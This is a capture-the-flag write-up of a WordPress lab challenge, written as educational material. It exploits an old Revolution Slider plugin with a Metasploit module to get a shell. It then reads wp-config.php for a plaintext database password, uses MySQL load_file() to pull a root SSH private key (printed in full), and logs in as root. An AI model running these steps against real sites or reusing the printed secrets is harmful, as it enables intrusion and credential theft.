Tags: wordpress network pentest
Rating:
# Wordpress
We're given a Wordpress site and told that it has the Revolution Slider plugin, and told that it's a little bit old. Let's find out how old it is by looking at the release log. For Wordpress sites, plugins are stored in the `wp-content/` folder, appropriately named `plugins/`. Each plugin has its own folder, which are appropriately enough named after the plugin. In this case, revslider can be found in the `revslider/` folder.
```
http://172.30.0.3/wp-content/plugins/revslider/
```
![](https://raw.githubusercontent.com/shawnduong/ctf-writeups/master/2019-TAMU/images/Wordpress-1.png)
Let's have a look at that `release_log.txt` file.
![](https://raw.githubusercontent.com/shawnduong/ctf-writeups/master/2019-TAMU/images/Wordpress-2.png)
Looks like it's running 3.0.95. This is indeed a [vulnerable](https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_revslider_upload_execute) version of Revolution Slider. Metasploit has a module to handle this.
```
$ msfconsole
msf> search revolution
msf> use unix/webapp/wp_revslider_upload_execute
msf> set RHOSTS 172.30.0.3
msf> exploit
```
![](https://raw.githubusercontent.com/shawnduong/ctf-writeups/master/2019-TAMU/images/Wordpress-3.png)
Looks like we've successfully spawned a meterpreter shell! Let's go ahead and drop a shell on the system and look around.
```
meterpreter> shell
```
Upon some snooping, we find an interesting file called `note.txt` at `/var/www/`. Upon reading it, we find a hint.
```
$ cat /var/www/note.txt
```
![](https://raw.githubusercontent.com/shawnduong/ctf-writeups/master/2019-TAMU/images/Wordpress-4.png)
Looks like there must be a database somewhere. Let's find out where by reading the `wp-config.php` file.
```
$ cat /var/www/wp-config.php
```
![](https://raw.githubusercontent.com/shawnduong/ctf-writeups/master/2019-TAMU/images/Wordpress-5.png)
Alright. Looks like we just found our way into the database. Let's go back to our system now and connect to it and have a look around. We're told that the SSH key is in /backup/id_rsa, so let's read that after we connect using `load_file()`.
```
$ mysql -h 172.30.0.2 -u wordpress --password="0NYa6PBH52y86C"
MySQL> select load_file("/backup/id_rsa")
```
![](https://raw.githubusercontent.com/shawnduong/ctf-writeups/master/2019-TAMU/images/Wordpress-6.png)
![](https://raw.githubusercontent.com/shawnduong/ctf-writeups/master/2019-TAMU/images/Wordpress-7.png)
Looks like we found it.
```
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA3Z35DpTcnm4kFkkGp6iDXqvUNH+/+hSDOY6rXsa40WMr7rjc
tHh8TgOBFZ6Rj5VzU/jY8O0qHxiPVn7BCYKhqyp1V1l9/ZCPRSjRLYy62dVTiHUt
ZbiPiY9+biHIsQ/nZfwiHmwlb0sWDoyFvX3OL/3AFMcYpZ4ldHQuwszJF4DeTV33
ruSBoXIiICQyNJBHTboVel+WXAfMNumYMVNrtrwpNoD7whv9Oa2afUejXMJL42Rw
8Xhab59HIIL9fl68FqgggVI4X3d/fzqKKGyoN5JxBLmQTCiVxhxTMv9OS0MhdSg6
Nh3+lf/wUuweUQXqmohvETntwwGs8jnJGCyeDwIDAQABAoIBAHGVRpG/n/cfMiWt
1dhWGMaLwJ4Ln6QXoU39nj1cEltWvayDWLKyUdtWFnGzLJ1vloVCNEX+96iqWMSX
AG7UYfGtOCjFuDoePh/PFK6IwzdkC4UTsWnCFucFAWKGtCpzoUB24jG/ccxBqpNY
WC9PbD7SigDcLfisPjwaU+EJPkNpl93VBk1BCJRbvWF+Wl/si3wmMZ0YRoyIAF5L
oBsq935xH8kJcixSVYKjG3hMUZfiLoQB+p/IFsxDlfGLE+M1esTZ5GIRjj+t7vBN
l2JZTY893gjfQzUv2WrJXzMhJvWGzOCsRRc4gOSeS6GYiip8glqg8iWHpWdgF6i9
oAQx5pkCgYEA7oTmvy0cXvhPjkEbrizCCqf6sXfZps5e6eminTTBGA8NW/Uq+SQv
5JEYxvIL+qMH6cKkc8rBaNhgy3vnv+UgE1PUFI0UWFGKb+OpzzvY/zkmf03enxrl
SK+QXH4FS9f7leivZRVEWBq1kDVIqHZtybYGg0etOvHYX0GwqV2UTy0CgYEA7dv0
bxz6CO9bhxxpXRrrykX2Z57J3JW2I3yVkCY+4Y6x106K11X+b1547kEZk40i2Ugc
iE6jcYIRiYNiSgb0Ph4uxZHFlvBr8JA2fGHYIAnGRcoc1Gzgz5omRvU9H8uy5ipO
LyZ2dnMgXRVOjuXoN4UZR2rgWmJVLD1q7eKnh6sCgYAnVOUUC2VNR9celx/wZdMN
nMubLi9G8Wr3WZ6GG+fnhrvmORSABvaa005pqApPp0irxHwH2BxypJO5mlIJ88eJ
SF6FkQoU0kVo0/rxgGX1GEB/56BZTj8W8FR23BUVf6UuADPEEHC3spfUEuVLWlQa
WhjS1yP6v1y1wIhYNWU6dQKBgQDbZ1zdcXkh7MgcpRR7kW2WM1rK0imZk29i5HSB
dwXhwWJCHGztnKEJ0bby7pHNDQ7sJhxLj14sQbIzikGLz0ZUVjsGeyQryrGGQUBB
E2/sfZeqoHhfad8lICfWpDgxsA/hR3y++VekgyWDNzgzj9bX/6oFuowgUzwFhtGv
hLbL6QKBgQCvcDMmWs2zXwmIo1+pIHUUSv2z3MWb0o1dzHQI/+FJEtyQPwL1nCwg
bJaC0KT45kw0IGVB2jhWf0KcMF37bpMpYJzdsktSAmHdjLKdcr6vw2MNpRapaNQe
On0QmLzbpFr9kjqorinKVkjk/WlTo9rKDSrLiUueEVYTxEMCi92giw==
-----END RSA PRIVATE KEY-----
```
Now we just need to paste this into a file on our own system, set the appropriate permissions, and then we can SSH into the root account and view the flag.
```
$ chmod 400 rsa.key
$ ssh -i rsa.key [email protected]
```
![](https://raw.githubusercontent.com/shawnduong/ctf-writeups/master/2019-TAMU/images/Wordpress-8.png)